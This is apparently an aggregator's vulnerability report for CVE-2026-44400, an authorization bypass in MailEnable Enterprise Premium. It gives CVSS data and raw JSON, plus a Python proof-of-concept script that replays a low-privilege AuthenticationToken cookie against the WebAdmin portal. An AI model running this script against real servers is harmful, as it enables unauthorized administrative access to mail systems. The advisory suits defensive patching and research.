Security Vulnerability Report
CVE-2026-44400 CVSS 8.1 HIGH

CVE-2026-44400

Published: 2026-05-08 21:16:28
Last Modified: 2026-05-08 21:16:28

Description

MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MailEnable Enterprise Premium <= 10.55

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL configuration
target_host = "http://target-mailenable-server"
webmail_login_url = f"{target_host}/mailmail/login.aspx"
webadmin_url = f"{target_host}/webadmin/mobile/default.aspx"

# Attacker credentials (low privilege)
username = "low_priv_user"
password = "password123"

# Step 1: Authenticate via WebMail and obtain PersistentLogin token
print("[+] Attempting to login via WebMail to obtain token...")
session = requests.Session()
payload = {
    "username": username,
    "password": password,
    "PersistentLogin": "on"  # Trigger persistent token generation
}
response = session.post(webmail_login_url, data=payload)

# Extract the AuthenticationToken cookie (Simulated extraction)
auth_token = session.cookies.get('AuthenticationToken')

if auth_token:
    print(f"[+] Token found: {auth_token}")

    # Step 2: Replay the token against WebAdmin portal
    print("[+] Replaying token against WebAdmin portal...")
    admin_cookies = {'AuthenticationToken': auth_token}
    admin_response = requests.get(webadmin_url, cookies=admin_cookies)

    # Check if authentication bypass was successful
    if admin_response.status_code == 200 and "Dashboard" in admin_response.text:
        print("[!] Successfully accessed WebAdmin with low-privilege token!")
        print(f"[+] Response length: {len(admin_response.text)}")
    else:
        print("[-] Failed to bypass authentication.")
else:
    print("[-] Could not retrieve AuthenticationToken cookie.")

References

https://www.mailenable.com/Premium-ReleaseNotes.txt
https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44400",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T21:16:28.260",
    "lastModified": "2026-05-08T21:16:28.260",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "MailEnable Enterprise Premium 10.55 and earlier contains an improper authorization vulnerability in the WebAdmin mobile portal that allows attackers to bypass authentication checks by reusing AuthenticationToken cookies generated for low-privileged users. Attackers can obtain a token from the WebMail login endpoint using the PersistentLogin parameter and replay it against the WebAdmin portal to perform highly privileged administrative actions."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.mailenable.com/Premium-ReleaseNotes.txt",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/mailenable-enterprise-premium-authorization-bypass-via-webadmin",
        "source": "[email protected]"
      }
    ]
  }
}